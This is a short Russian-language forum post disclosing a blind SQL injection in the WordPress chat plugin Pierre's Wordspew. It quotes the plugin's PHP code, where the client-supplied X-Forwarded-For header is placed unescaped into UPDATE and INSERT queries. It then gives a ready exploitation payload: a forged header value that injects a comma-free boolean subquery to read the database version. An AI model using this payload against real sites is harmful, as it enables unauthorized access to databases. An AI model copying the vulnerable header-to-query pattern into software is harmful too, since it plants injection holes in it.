Показать сообщение отдельно
Старый 14.12.2010, 18:15   #29
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию

Pierre's Wordspew

Уязвимость: Sqli (blind)

Зависимости: -

Source => usersonline.php

PHP код:
function jal_get_IP() {
    if (empty(
$_SERVER["HTTP_X_FORWARDED_FOR"])) {
        
$ip_address $_SERVER["REMOTE_ADDR"];
    } else {
        
$ip_address $_SERVER["HTTP_X_FORWARDED_FOR"];
    }
    if(
strpos($ip_address',') !== false) {
        
$ip_address explode(','$ip_address);
        
$ip_address $ip_address[0];
    }
    return 
$ip_address;
}

//Используется в запросах UPDATE, INSERT, например:

$sql="UPDATE $tableuseronline SET timestamp = '$timestamp', ip = '".jal_get_IP()."' $where";
        
mysql_query($sql$conn); 

//Сама функция используется в файле wordspew.php 
Экспплуатация:

Код:
X_FORWARDED_FOR: 1.1.1.1' where substring((select version()) from 1 for 1)='5' and username = 'your name'#
-> без запятых.

Последний раз редактировалось v1d0q; 14.12.2010 в 18:20..
v1d0q вне форума   Ответить с цитированием